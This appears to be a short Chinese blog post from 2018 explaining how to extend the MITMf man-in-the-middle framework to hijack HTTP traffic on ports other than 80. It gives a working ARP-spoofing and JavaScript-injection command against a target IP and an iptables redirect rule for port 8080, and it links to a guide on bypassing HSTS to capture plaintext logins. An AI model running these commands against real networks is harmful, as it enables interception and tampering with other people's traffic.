美文网首页
使用MITMF中间人攻击非80端口的HTTP

使用MITMF中间人攻击非80端口的HTTP

作者: Yaseng | 来源:发表于2018-07-21 20:40 被阅读30次

    说明

    MITMf 是一款可拓展性很高的中间人攻击框架,基于代理工具sergio-proxy修改而来。

    问题

    在实际使用中,发现一个问题,无法劫持修改非80端口 HTTP数据,例如注入js 替换字符串。
    例如注入一段js

    sudo  python mitmf.py  -i wlan0 --spoof --arp --target  172.18.219.3 --gateway  172.18.219.1  --inject --html-payload '<script>alert(0)</script>'
    
    

    victim 访问
    http://yaseng.org/project

    image

    访问非80端口的http web
    http://www.jcr.cacrnet.org.cn:8080/mmxb/CN/volumn/home.shtml
    无任何提示

    image

    attack 端

    img

    解决

    简单看了一下代码
    MITMf/core/utils.py line:84

        def HTTP(self, http_redir_port):
            log.debug("Setting iptables HTTP redirection rule from port 80 to {}".format(http_redir_port))
            os.system('iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port {}'.format(http_redir_port))
    

    iptables 把80端口的mitmf 监听的10000端口,很显然,需要劫持哪个端口,加一条规则就行了。
    例如

    sudo  iptables -t nat -A PREROUTING -p tcp --destination-port 8080 -j REDIRECT --to-port  10000
    
    

    attack

    [图片上传失败...(image-2d1ef3-1532176786357)]
    victim


    image

    更多

    使用mitmf 来绕过HSTS站点抓取登陆明文 http://yaseng.org/hsts-bypass-with-mitmf.html

    相关文章

      网友评论

          本文标题:使用MITMF中间人攻击非80端口的HTTP

          本文链接:https://www.haomeiwen.com/subject/nmlkmftx.html